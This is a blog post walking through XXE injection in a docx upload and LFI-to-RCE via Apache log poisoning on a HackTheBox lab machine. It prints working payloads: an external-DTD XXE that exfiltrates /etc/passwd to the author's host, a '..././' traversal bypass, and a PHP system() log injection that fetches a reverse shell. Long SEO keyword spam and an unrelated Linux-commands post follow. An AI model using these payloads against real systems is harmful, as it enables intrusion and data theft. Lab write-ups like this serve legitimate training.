segunda-feira, 5 de junho de 2023

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc cd doc unzip ../sample.docx 
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml cd customXml vim item1.xml 
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> 
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>"> 
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx * 
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090 
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php 

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1 

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd 

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log 
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999 
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>" 
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3 
Boom! we have a shell.

That's it for today's article see you next time.

References

Related word


  1. Hacker Techniques Tools And Incident Handling
  2. Hacker Tool Kit
  3. New Hacker Tools
  4. What Are Hacking Tools
  5. Pentest Tools Url Fuzzer
  6. Underground Hacker Sites
  7. Hacker Techniques Tools And Incident Handling
  8. Wifi Hacker Tools For Windows
  9. Hacking Tools
  10. Hacking Tools Pc
  11. Black Hat Hacker Tools
  12. Pentest Tools For Ubuntu
  13. Blackhat Hacker Tools
  14. Hacker Tools For Windows
  15. Pentest Tools For Mac
  16. Hacking Tools Kit
  17. Hacker Tools 2019
  18. Hacking Tools For Mac
  19. Hacker Tools Software
  20. Pentest Recon Tools
  21. Hacker Tools Apk Download
  22. Pentest Automation Tools
  23. Hacker Tools Software
  24. Computer Hacker
  25. Pentest Tools Open Source
  26. Pentest Automation Tools
  27. Easy Hack Tools
  28. Hack Tools
  29. Hacking Tools For Pc
  30. Hacker Hardware Tools
  31. Hacking Tools 2019
  32. Hack Tools For Games
  33. Hacking Tools Kit
  34. Hacking Tools For Windows 7
  35. Hacker Tool Kit
  36. Pentest Tools
  37. Hacker Tools 2020
  38. Hack Tools Github
  39. Wifi Hacker Tools For Windows
  40. Beginner Hacker Tools
  41. Hacks And Tools
  42. Hack Apps
  43. Hacking Tools Free Download
  44. Tools 4 Hack
  45. Best Hacking Tools 2019
  46. Tools For Hacker
  47. Nsa Hack Tools
  48. Pentest Tools For Android
  49. Pentest Tools Review
  50. Pentest Reporting Tools
  51. Beginner Hacker Tools
  52. Tools 4 Hack
  53. Free Pentest Tools For Windows
  54. Hack Tools
  55. How To Install Pentest Tools In Ubuntu
  56. Best Hacking Tools 2019
  57. Hack Apps
  58. Hack And Tools
  59. Wifi Hacker Tools For Windows
  60. Hacker Hardware Tools
  61. Hacker Tools Apk Download
  62. Hacking Tools Download
  63. Pentest Tools Online
  64. Best Hacking Tools 2020
  65. Hack Tools For Ubuntu
  66. Pentest Tools For Windows
  67. Hak5 Tools
  68. Hacker Search Tools
  69. What Is Hacking Tools
  70. Free Pentest Tools For Windows
  71. Hacker Tools List
  72. Pentest Reporting Tools
  73. Hacking Tools 2019
  74. Hack Tools 2019
  75. Pentest Tools Linux
  76. Hacking Tools Online
  77. Hacking Tools Download
  78. Hack Tools For Mac
  79. World No 1 Hacker Software
  80. Wifi Hacker Tools For Windows
  81. Underground Hacker Sites
  82. Hacker
  83. Blackhat Hacker Tools
  84. Hacker Tools Apk
  85. Hacker Tools Free Download
  86. Pentest Tools Online
  87. Hacking Tools Free Download
  88. Hacker Security Tools
  89. Hacker Tools Apk Download
  90. Pentest Reporting Tools
  91. Hacking Tools For Pc
  92. Hacking Tools For Beginners
  93. Kik Hack Tools
  94. Hacking Tools For Kali Linux
  95. Wifi Hacker Tools For Windows
  96. Hack Tools
  97. Pentest Automation Tools
  98. Hacker Tools For Mac
  99. Game Hacking
  100. Hack Tools
  101. Hacking Tools Download
  102. Android Hack Tools Github
  103. Hacker Tools For Ios
  104. Hak5 Tools
  105. Hack Tools For Ubuntu
  106. Pentest Tools Alternative
  107. Pentest Tools Free
  108. Nsa Hack Tools
  109. Hack Tools For Ubuntu
  110. How To Install Pentest Tools In Ubuntu
  111. Hack Tools Github
  112. Hacker Tools Mac
  113. Pentest Box Tools Download
  114. Hacking Tools Download
  115. Hack Tools Pc
  116. How To Hack
  117. Hacking Tools For Mac
  118. Hacker Tools For Ios
  119. Hack Tools Download
  120. Hacker Tools Apk
  121. Nsa Hack Tools
  122. Hack Tools Mac
  123. Pentest Tools For Ubuntu
  124. Beginner Hacker Tools
  125. Hacking Tools Windows 10
  126. Hacking Tools For Windows 7
  127. Kik Hack Tools
  128. Hack Tools For Mac
  129. Pentest Tools Bluekeep
  130. Hacker Tools Hardware
  131. Hack Tools For Ubuntu
  132. Hack Tools For Windows
  133. Best Pentesting Tools 2018
  134. Hacker Tools
  135. Hacker Tools 2020
  136. Best Hacking Tools 2020
  137. Hacking Tools For Pc
  138. Hacker Security Tools
  139. Pentest Tools Tcp Port Scanner
  140. How To Hack
  141. Hack Tools Pc
  142. Physical Pentest Tools
  143. New Hacker Tools
  144. Hacker Tools Apk Download
  145. Hacking Tools Pc
  146. Ethical Hacker Tools
  147. Hacking Tools Windows 10
  148. Hacking Tools Github
  149. Pentest Tools Url Fuzzer
  150. Hack Tools For Games
  151. Hack Tools For Mac
  152. Hacking Tools Online
  153. Hacker Tools Windows
  154. Hacking Tools
  155. Computer Hacker
  156. Hacker Tools Windows
  157. Best Hacking Tools 2020
  158. Hacking Tools 2019
  159. Blackhat Hacker Tools

Hackerhubb.blogspot.com

Hackerhubb.blogspot.comRelated news
  1. Pentest Tools Kali Linux
  2. Hack Tools For Ubuntu
  3. Hack Tools Mac
  4. Free Pentest Tools For Windows
  5. Hacker
  6. Best Pentesting Tools 2018
  7. Pentest Box Tools Download
  8. Kik Hack Tools
  9. Bluetooth Hacking Tools Kali
  10. Hacker Tools For Pc
  11. Black Hat Hacker Tools
  12. Pentest Tools Linux
  13. Hack Tools For Pc
  14. Hacker Tools Apk Download
  15. Usb Pentest Tools
  16. Pentest Tools Tcp Port Scanner
  17. Hack Tools 2019
  18. Kik Hack Tools
  19. Best Pentesting Tools 2018
  20. Pentest Tools Tcp Port Scanner
  21. Pentest Automation Tools
  22. Pentest Tools Website Vulnerability
  23. Hacker Tools 2019
  24. Pentest Tools Linux
  25. Hack Website Online Tool
  26. Hacking Tools Github
  27. Beginner Hacker Tools
  28. Hacker Tools Software
  29. Hack And Tools
  30. Android Hack Tools Github
  31. Hacker Tools For Ios
  32. Hacking Tools Github
  33. Pentest Tools Framework
  34. Pentest Recon Tools
  35. Hacker Tools Software
  36. Hacker Tools Online
  37. Hack Tools For Ubuntu
  38. Pentest Tools Alternative
  39. Tools 4 Hack
  40. Hacking Tools Free Download
  41. Pentest Tools Review
  42. Blackhat Hacker Tools
  43. Pentest Tools For Android
  44. Pentest Tools Nmap
  45. Pentest Tools Find Subdomains
  46. Hack Tools For Windows
  47. Pentest Tools Linux
  48. Hack Tools Pc
  49. Hacker Tools Github
  50. Pentest Box Tools Download
  51. Hack Tools Pc
  52. Hack App
  53. Pentest Tools Review
  54. Hacking Tools 2019
  55. Best Pentesting Tools 2018
  56. Pentest Tools Nmap
  57. Computer Hacker
  58. Hacker Tools Apk Download
  59. Hacker Tools For Windows
  60. Hacking Tools Mac
  61. Hackers Toolbox
  62. New Hacker Tools
  63. Pentest Tools Free
  64. How To Make Hacking Tools
  65. New Hack Tools
  66. Hack Tools
  67. Pentest Tools For Android
  68. Pentest Tools List
  69. Pentest Tools Kali Linux
  70. Pentest Tools Url Fuzzer
  71. Hackrf Tools
  72. Hacker Hardware Tools
  73. Pentest Tools Android
  74. How To Make Hacking Tools
  75. Bluetooth Hacking Tools Kali
  76. Hack Apps
  77. Hacking Tools For Windows Free Download
  78. Beginner Hacker Tools
  79. Pentest Tools For Ubuntu
  80. Pentest Tools Tcp Port Scanner
  81. Usb Pentest Tools
  82. How To Install Pentest Tools In Ubuntu
  83. Hacker Hardware Tools
  84. Hacking Tools For Windows
  85. Android Hack Tools Github
  86. Hacking Tools Online

Top Users Command In Linux Operating System With Descriptive Definitions


Linux is a command line interface and has a graphical interface as well. But the only thing we should know how we interact with Linux tools and applications with the help of command line. This is the basic thing of Linux.  As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well.
In this blog you will get a content about commands of Linux which are collectively related to the system users. That means if you wanna know any kind of information about the users of the system like username passwords and many more.

id

The "id" command is used in Linux operating system for the sake of getting knowledge about active user id with login and group. There may be different users and you wanna get a particular id of the user who is active at that time so for this you just have to type this command over the terminal.

last

The "last" command is used in Linux operating system to show the information about the last logins on the system. If you forget by which user id you have logged in at last time. So for this information you can search login detail by using this command.

who

The "who" command is used in Linux distributions to display the information about the current user which a an active profile over the Linux operating system. If you are in the system and you don't know about that active user and suddenly you have to know about that user detail so you can get the info by using this command.

groupadd

The "groupadd admin" is the command which is used in Linux operating system to add a group in the Linux system to gave the privileges to that group.

useradd

The "useradd" command is used in Linux operating system to add user or users to a specific group. If you wanna add a user name Umer so for this matter you just have to write a command i.e. useradd -c "Umer".

userdel

The "userdel" command is used in Linux operating system for the purpose to delete any user or users from the particular group present in the linux operating system. For example "userdel Umer" this command will delete the user named Umer.

adduser

The "adduser" command is a simple command used to create directly any user in the system. There is no need to make a group for this. You just have to type the command with user name like adduser Umer, it will created a user by name Umer.

usermod

The "usermod" is a command used in Linux operating system to modify the information of any particular user. You can edit or delete information of any particular user in the Linux operating system.


More information